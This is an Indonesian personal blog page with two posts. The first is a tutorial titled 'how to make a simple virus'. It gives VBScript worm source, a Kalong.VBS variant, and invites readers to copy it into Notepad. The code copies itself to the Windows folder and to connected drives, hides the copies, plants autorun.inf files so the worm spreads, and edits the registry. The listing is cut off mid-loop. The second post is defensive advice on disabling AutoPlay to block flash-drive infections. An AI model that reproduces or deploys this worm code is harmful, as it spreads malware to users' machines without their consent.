SELAMAT DATANG DI BLOG RUSTANTO
RUSTANTO_TI_1C: VIRUS SELAMAT DATANG DI BLOG RUSTANTO

Selasa, 21 Februari 2012

VIRUS

Cara Membuat Virus K4L0N9 Sederhana (From Friend's)


Sama saja dengan Kalong.VBS namun ditambahkan kemampuan manipulasi registry yang lebih mengerikan.

Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggak Copy > Paste….
‘Kalong-X
‘Varian dari Kalong.VBS
on error resume next
‘Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd
’siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “\k4l0n6-x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs”)
tf.attributes = 39
’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”\k4l0n6ms32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes = 39
set tf =fs.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)
‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: ->KALONG-X<- ::”

Sabtu, 04 April 2009

Mencegah Virus dalam Flashdisk

Ketika anda mencolokkan Flashdisk yang telah terinfeksi virus, misal virus Conficker/Downadup atau virus The Legend of Aang ke Laptop atau komputer anda, secara otomatis fitur AutoPlay yang secara default aktif di Sistem Operasi Windows, akan menjalankan virus tersebut dan menginfeksi laptop anda. Jadi, daripada anda terlanjur terinfeksi dan akhirnya harus susah payah mencari cara menghapus virus Conficker/Downadup atau cara menghapus virus the legend of aang, lebih baik anda lakukan pencegahan sedini mungkin. Caranya sangat sederhana yaitu dengan menonaktifkan fitur AutoPlay di Laptop atau Komputer anda.
Ada berbagai macam software yang bisa anda gunakan untuk menonaktifkan AutoPlay, tapi alangkahnya lebih baiknya bila anda mengetahui cara manual, untuk menonaktifkan AutoPlay, sehingga anda tidak terlalu tergantung pada software apapun.
  1. Bagi anda pengguna Windows XP, silahkan baca Menonaktifkan “AutoPlay” untuk Mencegah Virus untuk menonaktifkan fitur AutoPlay di Lappy anda.
  2. Kalau anda menggunakan Windows Vista, penjelasan tentang cara menonaktifkan AutoPlay bisa disimak di Menonaktifkan AutoPlay di Windows Vista
  3. Tapi, kalau anda menggunakan Windows lain, lakukan langkah sederhana berikut ini :
  • Akses Registry Editor melalui menu (Start | RUN | regedit)
  • Cari key berikut ini: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
  • Double klik NoDriveTypeAutoRun pada jendela sebelah kanan, dan masukkan nilai (Value data) Hexadecimal FF

Tidak ada komentar:

Posting Komentar